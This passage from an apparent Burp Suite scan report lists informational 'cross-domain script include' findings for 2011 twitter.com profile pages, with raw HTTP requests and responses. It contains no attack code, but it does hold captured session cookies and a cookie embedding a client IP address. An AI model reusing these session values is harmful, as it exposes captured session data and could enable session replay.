Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296262534" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296262534" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/api.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/dismissable.js?1296262534" type="text/javascript"></script>
...[SNIP]...

18.322. http://twitter.com/Beckett_News previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/Beckett_News

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296258363/javascripts/dismissable.js?1296263125
http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296263125
http://a0.twimg.com/a/1296258363/javascripts/twitter.js?1296263125
http://a2.twimg.com/a/1296258363/javascripts/api.js?1296263125
http://a2.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296263125
http://a3.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296263125
http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296263125
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:57 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265977-87220-8975
ETag: "04df87e3f545648158c89bbf858582e1"
Last-Modified: Sat, 29 Jan 2011 01:52:57 GMT
X-Runtime: 0.01098
Content-Type: text/html; charset=utf-8
Content-Length: 40483
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/twitter.js?1296263125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296263125" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296263125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296263125" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296263125" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/api.js?1296263125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296263125" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/dismissable.js?1296263125" type="text/javascript"></script>
...[SNIP]...

18.323. http://twitter.com/BosHerald_Edge/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/BosHerald_Edge/

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296258363/javascripts/dismissable.js?1296261409
http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296261409
http://a1.twimg.com/a/1296258363/javascripts/api.js?1296261409
http://a2.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296261409
http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296261409
http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261409
http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296261409
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:21 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265281-63986-28033
ETag: "94982feeb68a0a8cb68c04820be2cd8d"
Last-Modified: Sat, 29 Jan 2011 01:41:21 GMT
X-Runtime: 0.00768
Content-Type: text/html; charset=utf-8
Content-Length: 52761
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296261409" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296261409" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296261409" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261409" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296261409" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/api.js?1296261409" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261409" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/dismissable.js?1296261409" type="text/javascript"></script>
...[SNIP]...

18.324. http://twitter.com/ChrisLambton13 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/ChrisLambton13

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296245718/javascripts/dismissable.js?1296247248
http://a0.twimg.com/a/1296245718/javascripts/geov1.js?1296247248
http://a0.twimg.com/a/1296245718/javascripts/twitter.js?1296247248
http://a2.twimg.com/a/1296245718/javascripts/api.js?1296247248
http://a2.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296247248
http://a2.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296247248
http://a3.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247248
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:51:48 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265908-61244-34588
ETag: "2188d703ab23d0ac8a30be86c7dd57e4"
Last-Modified: Sat, 29 Jan 2011 01:51:48 GMT
X-Runtime: 0.01239
Content-Type: text/html; charset=utf-8
Content-Length: 50278
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/twitter.js?1296247248" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296247248" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296247248" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247248" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/geov1.js?1296247248" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/api.js?1296247248" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247248" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/dismissable.js?1296247248" type="text/javascript"></script>
...[SNIP]...

18.325. http://twitter.com/ConanOBrien previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/ConanOBrien

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296261955
http://a0.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261955
http://a1.twimg.com/a/1296258363/javascripts/dismissable.js?1296261955
http://a1.twimg.com/a/1296258363/javascripts/twitter.js?1296261955
http://a2.twimg.com/a/1296258363/javascripts/geov1.js?1296261955
http://a3.twimg.com/a/1296258363/javascripts/api.js?1296261955
http://a3.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296261955
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:55 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265975-23118-1747
ETag: "86f99f7437978cad54926bacf38c847f"
Last-Modified: Sat, 29 Jan 2011 01:52:55 GMT
X-Runtime: 0.01272
Content-Type: text/html; charset=utf-8
Content-Length: 36266
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/twitter.js?1296261955" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296261955" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296261955" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261955" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/geov1.js?1296261955" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/api.js?1296261955" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261955" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/dismissable.js?1296261955" type="text/javascript"></script>
...[SNIP]...

18.326. http://twitter.com/DustinPedroia15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/DustinPedroia15

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296261955
http://a0.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261955
http://a1.twimg.com/a/1296258363/javascripts/dismissable.js?1296261955
http://a1.twimg.com/a/1296258363/javascripts/twitter.js?1296261955
http://a2.twimg.com/a/1296258363/javascripts/geov1.js?1296261955
http://a3.twimg.com/a/1296258363/javascripts/api.js?1296261955
http://a3.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296261955
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266020-27916-18382
ETag: "e0a2dddf6e04f8631a548ec38cc9be5b"
Last-Modified: Sat, 29 Jan 2011 01:53:40 GMT
X-Runtime: 0.01575
Content-Type: text/html; charset=utf-8
Content-Length: 29153
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/twitter.js?1296261955" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296261955" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296261955" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261955" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/geov1.js?1296261955" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/api.js?1296261955" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261955" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/dismissable.js?1296261955" type="text/javascript"></script>
...[SNIP]...

18.327. http://twitter.com/ExpertDan previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/ExpertDan

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /ExpertDan HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:11:46 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234706-2062-7048
ETag: "d1b23d363622af7dc57fa3978eedfa84"
Last-Modified: Fri, 28 Jan 2011 17:11:46 GMT
X-Runtime: 0.00839
Content-Type: text/html; charset=utf-8
Content-Length: 53196
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.328. http://twitter.com/ExpertDan previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/ExpertDan

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /ExpertDan HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:52 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225052-83422-12297
ETag: "71df0fbad70a67fb009c57f7a62454f1"
Last-Modified: Fri, 28 Jan 2011 14:30:52 GMT
X-Runtime: 0.01535
Content-Type: text/html; charset=utf-8
Content-Length: 53009
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.329. http://twitter.com/GQMagazine previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/GQMagazine

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296261955
http://a0.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261955
http://a1.twimg.com/a/1296258363/javascripts/dismissable.js?1296261955
http://a1.twimg.com/a/1296258363/javascripts/twitter.js?1296261955
http://a2.twimg.com/a/1296258363/javascripts/geov1.js?1296261955
http://a3.twimg.com/a/1296258363/javascripts/api.js?1296261955
http://a3.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296261955
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:54 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265974-66159-11366
ETag: "0c7b3f1ee02a220dddae84a56bd4dae8"
Last-Modified: Sat, 29 Jan 2011 01:52:54 GMT
X-Runtime: 0.01364
Content-Type: text/html; charset=utf-8
Content-Length: 51000
Pragma: no-cache
X-Revision: DEV
